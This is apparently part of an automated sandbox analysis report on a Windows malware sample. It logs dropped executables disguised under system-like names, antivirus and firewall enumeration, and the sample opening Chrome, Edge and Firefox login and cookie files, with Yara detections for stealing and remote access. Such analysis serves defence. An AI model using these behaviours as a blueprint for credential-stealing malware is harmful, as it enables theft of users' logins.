Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: W4tW72sfAD.exe, type: SAMPLE
Source: Yara match File source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED